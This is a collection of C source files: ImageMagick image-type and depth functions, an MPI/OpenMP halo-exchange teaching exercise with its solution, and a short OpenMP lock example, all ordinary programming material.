%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IsImageMonochrome() returns MagickTrue if type of the image is bi-level.
%
% The format of the IsImageMonochrome method is:
%
% MagickBooleanType IsImageMonochrome(const Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport MagickBooleanType IsImageMonochrome(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->type == BilevelType)
return(MagickTrue);
return(MagickFalse);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I s I m a g e O p a q u e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IsImageOpaque() returns MagickTrue if none of the pixels in the image have
% an alpha value other than OpaqueAlpha (QuantumRange).
%
% Returns MagickTrue immediately if the alpha channel is not available.
%
% The format of the IsImageOpaque method is:
%
% MagickBooleanType IsImageOpaque(const Image *image,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType IsImageOpaque(const Image *image,
ExceptionInfo *exception)
{
CacheView
*image_view;
const Quantum
*p;
ssize_t
x;
ssize_t
y;
/*
Determine if image is opaque.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->alpha_trait == UndefinedPixelTrait)
return(MagickTrue);
image_view=AcquireVirtualCacheView(image,exception);
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
if (GetPixelAlpha(image,p) != OpaqueAlpha)
break;
p+=GetPixelChannels(image);
}
if (x < (ssize_t) image->columns)
break;
}
image_view=DestroyCacheView(image_view);
return(y < (ssize_t) image->rows ? MagickFalse : MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S e t I m a g e D e p t h %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% SetImageDepth() sets the depth of the image.
%
% The format of the SetImageDepth method is:
%
% MagickBooleanType SetImageDepth(Image *image,const size_t depth,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o depth: the image depth.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType SetImageDepth(Image *image,
const size_t depth,ExceptionInfo *exception)
{
CacheView
*image_view;
MagickBooleanType
status;
QuantumAny
range;
ssize_t
y;
assert(image != (Image *) NULL);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"...");
assert(image->signature == MagickCoreSignature);
if (depth >= MAGICKCORE_QUANTUM_DEPTH)
{
image->depth=depth;
return(MagickTrue);
}
range=GetQuantumRange(depth);
if (image->storage_class == PseudoClass)
{
ssize_t
i;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->colors,1)
#endif
for (i=0; i < (ssize_t) image->colors; i++)
{
if ((GetPixelRedTraits(image) & UpdatePixelTrait) != 0)
image->colormap[i].red=(double) ScaleAnyToQuantum(ScaleQuantumToAny(
ClampPixel(image->colormap[i].red),range),range);
if ((GetPixelGreenTraits(image) & UpdatePixelTrait) != 0)
image->colormap[i].green=(double) ScaleAnyToQuantum(ScaleQuantumToAny(
ClampPixel(image->colormap[i].green),range),range);
if ((GetPixelBlueTraits(image) & UpdatePixelTrait) != 0)
image->colormap[i].blue=(double) ScaleAnyToQuantum(ScaleQuantumToAny(
ClampPixel(image->colormap[i].blue),range),range);
if ((GetPixelAlphaTraits(image) & UpdatePixelTrait) != 0)
image->colormap[i].alpha=(double) ScaleAnyToQuantum(ScaleQuantumToAny(
ClampPixel(image->colormap[i].alpha),range),range);
}
}
status=MagickTrue;
image_view=AcquireAuthenticCacheView(image,exception);
#if !defined(MAGICKCORE_HDRI_SUPPORT)
DisableMSCWarning(4127)
if ((1UL*QuantumRange) <= MaxMap)
RestoreMSCWarning
{
Quantum
*depth_map;
ssize_t
i;
/*
Scale pixels to desired (optimized with depth map).
*/
depth_map=(Quantum *) AcquireQuantumMemory(MaxMap+1,sizeof(*depth_map));
if (depth_map == (Quantum *) NULL)
ThrowFatalException(ResourceLimitFatalError,"MemoryAllocationFailed");
for (i=0; i <= (ssize_t) MaxMap; i++)
depth_map[i]=ScaleAnyToQuantum(ScaleQuantumToAny((Quantum) i,range),
range);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
ssize_t
x;
Quantum
*magick_restrict q;
if (status == MagickFalse)
continue;
q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,
exception);
if (q == (Quantum *) NULL)
{
status=MagickFalse;
continue;
}
for (x=0; x < (ssize_t) image->columns; x++)
{
ssize_t
j;
for (j=0; j < (ssize_t) GetPixelChannels(image); j++)
{
PixelChannel
channel;
PixelTrait
traits;
channel=GetPixelChannelChannel(image,j);
traits=GetPixelChannelTraits(image,channel);
if ((traits & UpdatePixelTrait) == 0)
continue;
q[j]=depth_map[ScaleQuantumToMap(q[j])];
}
q+=GetPixelChannels(image);
}
if (SyncCacheViewAuthenticPixels(image_view,exception) == MagickFalse)
{
status=MagickFalse;
continue;
}
}
image_view=DestroyCacheView(image_view);
depth_map=(Quantum *) RelinquishMagickMemory(depth_map);
if (status != MagickFalse)
image->depth=depth;
return(status);
}
#endif
/*
Scale pixels to desired depth.
*/
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
ssize_t
x;
Quantum
*magick_restrict q;
if (status == MagickFalse)
continue;
q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
{
status=MagickFalse;
continue;
}
for (x=0; x < (ssize_t) image->columns; x++)
{
ssize_t
i;
for (i=0; i < (ssize_t) GetPixelChannels(image); i++)
{
PixelChannel
channel;
PixelTrait
traits;
channel=GetPixelChannelChannel(image,i);
traits=GetPixelChannelTraits(image,channel);
if ((traits & UpdatePixelTrait) == 0)
continue;
q[i]=ScaleAnyToQuantum(ScaleQuantumToAny(ClampPixel((MagickRealType)
q[i]),range),range);
}
q+=GetPixelChannels(image);
}
if (SyncCacheViewAuthenticPixels(image_view,exception) == MagickFalse)
{
status=MagickFalse;
continue;
}
}
image_view=DestroyCacheView(image_view);
if (status != MagickFalse)
image->depth=depth;
return(status);
}
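/*
  Illustrative usage sketch (not part of the original source): clamp pixel
  precision to 8 significant bits, e.g. before writing a byte-per-sample
  format.  CatchException() is used here purely to illustrate error
  handling:

    if (SetImageDepth(image,8,exception) == MagickFalse)
      CatchException(exception);
*/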
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S e t I m a g e T y p e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% SetImageType() sets the type of the image.  Choose from these types:
%
%      BilevelType            GrayscaleType         GrayscaleAlphaType
%      PaletteType            PaletteAlphaType      PaletteBilevelAlphaType
%      TrueColorType          TrueColorAlphaType    ColorSeparationType
%      ColorSeparationAlphaType                     OptimizeType
%
% The format of the SetImageType method is:
%
% MagickBooleanType SetImageType(Image *image,const ImageType type,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o type: Image type.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType SetImageType(Image *image,const ImageType type,
ExceptionInfo *exception)
{
const char
*artifact;
ImageInfo
*image_info;
MagickBooleanType
status;
QuantizeInfo
*quantize_info;
assert(image != (Image *) NULL);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"...");
assert(image->signature == MagickCoreSignature);
status=MagickTrue;
image_info=AcquireImageInfo();
image_info->dither=image->dither;
artifact=GetImageArtifact(image,"dither");
if (artifact != (const char *) NULL)
(void) SetImageOption(image_info,"dither",artifact);
switch (type)
{
case BilevelType:
{
status=TransformImageColorspace(image,GRAYColorspace,exception);
(void) NormalizeImage(image,exception);
quantize_info=AcquireQuantizeInfo(image_info);
quantize_info->number_colors=2;
quantize_info->colorspace=GRAYColorspace;
status=QuantizeImage(quantize_info,image,exception);
quantize_info=DestroyQuantizeInfo(quantize_info);
image->alpha_trait=UndefinedPixelTrait;
break;
}
case GrayscaleType:
{
status=TransformImageColorspace(image,GRAYColorspace,exception);
image->alpha_trait=UndefinedPixelTrait;
break;
}
case GrayscaleAlphaType:
{
status=TransformImageColorspace(image,GRAYColorspace,exception);
if (image->alpha_trait == UndefinedPixelTrait)
(void) SetImageAlphaChannel(image,OpaqueAlphaChannel,exception);
break;
}
case PaletteType:
{
status=TransformImageColorspace(image,sRGBColorspace,exception);
if ((image->storage_class == DirectClass) || (image->colors > 256))
{
quantize_info=AcquireQuantizeInfo(image_info);
quantize_info->number_colors=256;
status=QuantizeImage(quantize_info,image,exception);
quantize_info=DestroyQuantizeInfo(quantize_info);
}
image->alpha_trait=UndefinedPixelTrait;
break;
}
case PaletteBilevelAlphaType:
{
ChannelType
channel_mask;
status=TransformImageColorspace(image,sRGBColorspace,exception);
if (image->alpha_trait == UndefinedPixelTrait)
(void) SetImageAlphaChannel(image,OpaqueAlphaChannel,exception);
channel_mask=SetImageChannelMask(image,AlphaChannel);
(void) BilevelImage(image,(double) QuantumRange/2.0,exception);
(void) SetImageChannelMask(image,channel_mask);
quantize_info=AcquireQuantizeInfo(image_info);
status=QuantizeImage(quantize_info,image,exception);
quantize_info=DestroyQuantizeInfo(quantize_info);
break;
}
case PaletteAlphaType:
{
status=TransformImageColorspace(image,sRGBColorspace,exception);
if (image->alpha_trait == UndefinedPixelTrait)
(void) SetImageAlphaChannel(image,OpaqueAlphaChannel,exception);
quantize_info=AcquireQuantizeInfo(image_info);
quantize_info->colorspace=TransparentColorspace;
status=QuantizeImage(quantize_info,image,exception);
quantize_info=DestroyQuantizeInfo(quantize_info);
break;
}
case TrueColorType:
{
status=TransformImageColorspace(image,sRGBColorspace,exception);
if (image->storage_class != DirectClass)
status=SetImageStorageClass(image,DirectClass,exception);
image->alpha_trait=UndefinedPixelTrait;
break;
}
case TrueColorAlphaType:
{
status=TransformImageColorspace(image,sRGBColorspace,exception);
if (image->storage_class != DirectClass)
status=SetImageStorageClass(image,DirectClass,exception);
if (image->alpha_trait == UndefinedPixelTrait)
(void) SetImageAlphaChannel(image,OpaqueAlphaChannel,exception);
break;
}
case ColorSeparationType:
{
status=TransformImageColorspace(image,CMYKColorspace,exception);
if (image->storage_class != DirectClass)
status=SetImageStorageClass(image,DirectClass,exception);
image->alpha_trait=UndefinedPixelTrait;
break;
}
case ColorSeparationAlphaType:
{
status=TransformImageColorspace(image,CMYKColorspace,exception);
if (image->storage_class != DirectClass)
status=SetImageStorageClass(image,DirectClass,exception);
if (image->alpha_trait == UndefinedPixelTrait)
status=SetImageAlphaChannel(image,OpaqueAlphaChannel,exception);
break;
}
case OptimizeType:
case UndefinedType:
break;
}
image_info=DestroyImageInfo(image_info);
if (status == MagickFalse)
return(status);
image->type=type;
return(MagickTrue);
}
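/*
  Illustrative usage sketch (not part of the original source): coerce an
  image into a palette representation (at most 256 colors) before encoding
  a palette-limited format:

    if (SetImageType(image,PaletteType,exception) == MagickFalse)
      CatchException(exception);
*/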
|
threading-multiple.c | #include <omp.h>
#include "mpi.h"
#include <stdio.h>
void compute_row(int row_index, float input[6][8], float output[6][8])
{
for (int j = 0; j < 8; j = j + 1)
{
/* Here is the 5-point stencil */
const int right_column_index = (j + 1) % 8;
const int left_column_index = (j + 8 - 1) % 8;
const int top_row_index = row_index-1;
const int bottom_row_index = row_index+1;
output[row_index][j] = (input[row_index][j] +
input[row_index][left_column_index] +
input[row_index][right_column_index] +
input[top_row_index][j] +
input[bottom_row_index][j]);
}
}
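/* Worked example of the periodic column wrap above, added for clarity:
 * for j = 0 the left neighbour is (0 + 8 - 1) % 8 = 7 and the right
 * neighbour is (0 + 1) % 8 = 1, so columns wrap around the row ends.
 * Rows do not wrap: row_index-1 and row_index+1 are used directly, which
 * is why callers only pass interior rows 1..4 of the 6-row working array
 * (rows 0 and 5 hold the halo received from the other rank). */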
void report_thread_id(const char *prefix, int step, int rank)
{
int thread_id = omp_get_thread_num();
int num_threads = omp_get_num_threads();
printf("Step %03d: %s: Working on thread id %d of %d on rank %d\n",
step, prefix, thread_id, num_threads, rank);
}
int main(int argc, char **argv)
{
  /* ==== SOLUTION ====
   *
   * We want general thread parallelism (any thread may make MPI calls,
   * concurrently), so we request the MPI_THREAD_MULTIPLE threading
   * mode. */
/* Initialize the MPI environment and check */
int provided, required = MPI_THREAD_MULTIPLE;
MPI_Init_thread(NULL, NULL, required, &provided);
MPI_Comm comm = MPI_COMM_WORLD;
  /* If the MPI library cannot provide the requested threading level, stop */
if (required != provided)
{
printf("Sorry, the MPI library does not provide "
"this threading level! Aborting!\n");
MPI_Abort(comm, 1);
}
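  /* For reference, MPI defines four threading levels, in increasing order
   * of permissiveness: MPI_THREAD_SINGLE (no threading),
   * MPI_THREAD_FUNNELED (only the main thread calls MPI),
   * MPI_THREAD_SERIALIZED (any thread, but one at a time) and
   * MPI_THREAD_MULTIPLE (any thread, concurrently).  The tasks below issue
   * MPI calls from several threads at once, hence MPI_THREAD_MULTIPLE. */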
int rank, size;
MPI_Comm_rank(comm, &rank);
MPI_Comm_size(comm, &size);
if (size != 2)
{
if (rank == 0)
{
printf("Only two ranks is supported for this exercise, "
"please re-run with two ranks\n");
}
MPI_Finalize();
return 0;
}
/* Prepare the initial values for this process */
float local_data_set[4][8];
printf("Local data set on rank %d was:\n", rank);
for (int i = 0; i < 4; i = i + 1)
{
printf(" [ ");
for (int j = 0; j < 8; j = j + 1)
{
      /* Make the local data different on each rank, so that we can see
       * that the communication works properly. */
      local_data_set[i][j] = (float) (rank + 1);
if (j != 0)
{
printf(", ");
}
printf("%g", local_data_set[i][j]);
}
printf(" ]\n");
}
float working_data_set[6][8];
for (int i = 0; i < 4; i = i + 1)
{
for (int j = 0; j < 8; j = j + 1)
{
/* Initialize the local part of the working data set */
working_data_set[i+1][j] = local_data_set[i][j];
}
}
/* Prepare to report whether the code is correct */
int success = 1;
/* Do the loop over heat-propagation steps */
float next_working_data_set[6][8];
  float total = 0, local_total, temporary_total; /* total must start at 0: rank 0 reads it before the first reduction completes */
const int total_root_rank = 0;
MPI_Request total_request = MPI_REQUEST_NULL;
const int max_step = 10;
  omp_set_nested(1); /* enable nested parallel regions (deprecated since OpenMP 5.0 in favor of omp_set_max_active_levels()) */
report_thread_id("Before loop", -1, rank);
for (int step = 0; step < max_step; step = step + 1)
{
#pragma omp parallel num_threads(4)
{
report_thread_id("First region", step, rank);
#pragma omp parallel num_threads(2) /* Make a nested team */
{
report_thread_id("Second region", step, rank);
MPI_Request sent_to_destination[2];
int send_up_tag = 0, send_down_tag = 1;
#pragma omp task
{
report_thread_id("isend", step, rank);
/* Prepare to send the border data */
int destination_rank = size-rank-1;
MPI_Isend(working_data_set[1], 8, MPI_FLOAT, destination_rank,
send_up_tag, comm, &sent_to_destination[0]);
MPI_Isend(working_data_set[4], 8, MPI_FLOAT, destination_rank,
send_down_tag, comm, &sent_to_destination[1]);
}
#pragma omp task
{
report_thread_id("recv", step, rank);
/* Prepare to receive the halo data */
int source_rank = size-rank-1;
MPI_Recv(working_data_set[5], 8, MPI_FLOAT, source_rank,
send_up_tag, comm, MPI_STATUS_IGNORE);
MPI_Recv(working_data_set[0], 8, MPI_FLOAT, source_rank,
send_down_tag, comm, MPI_STATUS_IGNORE);
}
      /* The explicit barrier also completes the tasks generated above, so
       * the halo receives have finished once every thread passes it. */
      #pragma omp barrier
      /* ==== SOLUTION ====
       *
       * Each iteration of the loop below does an equal part of the
       * non-local work, i.e. rows 1 and 4 of working_data_set (the rows
       * that depend on the halo). */
/* Do the non-local computation. OpenMP will distribute each
* iteration to a different thread. */
int non_local_work[] = {1, 4};
#pragma omp parallel for
for (int k = 0; k != 2; k = k + 1)
{
report_thread_id("non-local", step, rank);
compute_row(non_local_work[k], working_data_set, next_working_data_set);
}
/* Implied thread barrier here */
#pragma omp task
{
/* Wait for the halo-exchange sends to complete */
MPI_Wait(&sent_to_destination[0], MPI_STATUS_IGNORE);
MPI_Wait(&sent_to_destination[1], MPI_STATUS_IGNORE);
}
      /* The implicit barrier at the end of the nested parallel region
       * also waits for the task above, so no explicit barrier is needed */
}
#pragma omp parallel num_threads(2)
{
report_thread_id("Third region", step, rank);
      /* ==== SOLUTION ====
       *
       * Each iteration of the loop below does an equal part of the local
       * work, i.e. rows 2 and 3 of working_data_set (the rows that depend
       * only on local data). */
/* Do the local computation. OpenMP will distribute each
* iteration to a different thread. */
int local_work[] = {2, 3};
#pragma omp for
for (int k = 0; k != 2; k = k + 1)
{
report_thread_id("local", step, rank);
compute_row(local_work[k], working_data_set, next_working_data_set);
}
/* Implied thread barrier here */
}
}
/* End thread-parallel region */
/* Compute the total heat via non-blocking reduction */
if (step % 5 == 4)
{
local_total = 0;
for (int i = 1; i < 5; i = i + 1)
{
for (int j = 0; j < 8; j = j + 1)
{
local_total += next_working_data_set[i][j];
}
}
      fprintf(stderr, "Doing a non-blocking reduction on step %d\n", step);
MPI_Ireduce(&local_total, &temporary_total, 1, MPI_FLOAT, MPI_SUM, total_root_rank, comm, &total_request);
}
/* Wait for the most recent total heat reduction, 4 steps after it was started */
if (step % 5 == 3 && total_request != MPI_REQUEST_NULL)
{
MPI_Wait(&total_request, MPI_STATUS_IGNORE);
total = temporary_total;
if (rank == total_root_rank)
{
fprintf(stderr, "Total after waiting at step %d was %g\n", step, total);
}
}
if (rank == total_root_rank)
{
const float expected_total_value = (step < 8) ? 0 : 300000;
if (total != expected_total_value)
{
success = 0;
printf("Failed on step %d with total %g not matching expected %g\n",
step, total, expected_total_value);
}
}
/* Prepare to iterate */
for (int i = 1; i < 5; i = i + 1)
{
for (int j = 0; j < 8; j = j + 1)
{
/* copy the output back to the input array */
working_data_set[i][j] = next_working_data_set[i][j];
}
}
}
/* Now that we have left the main loop, we should wait for
* the most recent total heat reduction to complete. */
if (total_request != MPI_REQUEST_NULL)
{
MPI_Wait(&total_request, MPI_STATUS_IGNORE);
total = temporary_total;
if (rank == total_root_rank)
{
fprintf(stderr, "Total after waiting at step %d was %g\n",
max_step - 1, total);
}
}
if (rank == total_root_rank)
{
const float expected_total_value = 9.375e+08;
if (total != expected_total_value)
{
success = 0;
printf("Failed on step %d with total %g not matching expected %g\n",
max_step - 1, total, expected_total_value);
}
}
/* Report whether the code is correct */
if (rank == total_root_rank)
{
if (success)
{
printf("SUCCESS on rank %d!\n", rank);
}
else
{
printf("Improvement needed before rank %d can report success!\n", rank);
}
}
/* Clean up and exit */
MPI_Finalize();
return 0;
}
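/* A plausible way to build and run this exercise, assuming an MPI
 * distribution that provides the mpicc wrapper and mpirun launcher
 * (names vary between MPI implementations):
 *
 *   mpicc -fopenmp threading-multiple.c -o threading-multiple
 *   mpirun -np 2 ./threading-multiple
 */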
|
lock.c | #include <stdio.h>
#include <omp.h>
static omp_lock_t lock;
int main(int argc, char const *argv[])
{
  /* Initialize the lock before any thread can use it */
  omp_init_lock(&lock);
#pragma omp parallel for
for (size_t i = 0; i < 5; i++)
{
omp_set_lock(&lock);
printf("%d+\n", omp_get_thread_num());
printf("%d-\n", omp_get_thread_num());
omp_unset_lock(&lock);
}
  // lock routines always take the lock by address
omp_destroy_lock(&lock);
return 0;
}
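/* For a fixed block like the paired printf calls above, a named critical
 * section is a simpler equivalent; a minimal sketch:
 *
 *   #pragma omp critical(print_block)
 *   {
 *     printf("%d+\n", omp_get_thread_num());
 *     printf("%d-\n", omp_get_thread_num());
 *   }
 *
 * Explicit omp_lock_t objects are worth the extra bookkeeping when the
 * lock must be held across function boundaries, or acquired conditionally
 * with omp_test_lock(). */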
|